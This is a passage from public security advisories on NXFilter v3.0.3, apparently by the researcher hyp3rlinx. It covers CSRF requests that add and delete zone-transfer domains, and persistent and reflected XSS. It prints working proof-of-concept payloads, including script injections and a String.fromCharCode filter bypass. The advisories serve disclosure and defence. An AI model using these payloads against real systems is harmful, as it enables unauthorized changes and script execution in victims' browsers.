<input type="text" name="domain" value="hyp3rlinx.altervista.org">
<input type="text" name="ip" value="6.6.6.0">
</form>
5) CSRF delete zone transfer domains
http://localhost/config,zone_transfer.jsp?action_flag=delete&id=1
Disclosure Timeline:
======================================
Vendor Notification: October 18, 2015
November 5, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Description:
==========================================================
Request Method(s): [+] GET / POST
Vulnerable Product: [+] NXFilter v3.0.3
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-XSS.txt
Vendor:
================================
www.nxfilter.org/p2/
Product:
================================
NXFilter v3.0.3
Vulnerability Type:
=========================
Persistent & Reflected XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Persistent & reflected XSS entry points exist allowing arbitrary client
side browser code execution
on victims who click our infected linx or visit persistently stored XSS
payloads. XSS strings seem
to get filtered, yet we can defeat that using JS String.fromCharCode()
functions.
Exploit code(s):
===============
1) persistent XSS under category / custom
"name" parameter is vulnerable to persistent XSS injection using POST
method.
http://localhost/category,custom.jsp
<input type="text" name="description" value="<script>alert(666)</script>"
size="50">
2) reflected XSS
http://localhost/classifier,ruleset.jsp?action_flag=&page=1&kw=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E&id=&domain=&keyword=&points=
3) reflected XSS
http://localhost/report,daily.jsp?stime=2015%2F10%2F17&time_option=yesterday&user=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2872%29%2bString.fromCharCode%2869%29%2bString.fromCharCode%2876%29%2bString.fromCharCode%2876%29%29%3C/script%3E
Disclosure Timeline:
=======================================
Vendor Notification: October 18, 2015
November 5, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===================================================
High
Description:
==================================================
Request Method(s): [+] GET / POST
Vulnerable Product: [+] NXFilter v3.0.3
Vulnerable Parameter(s): [+] name, user, kw
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx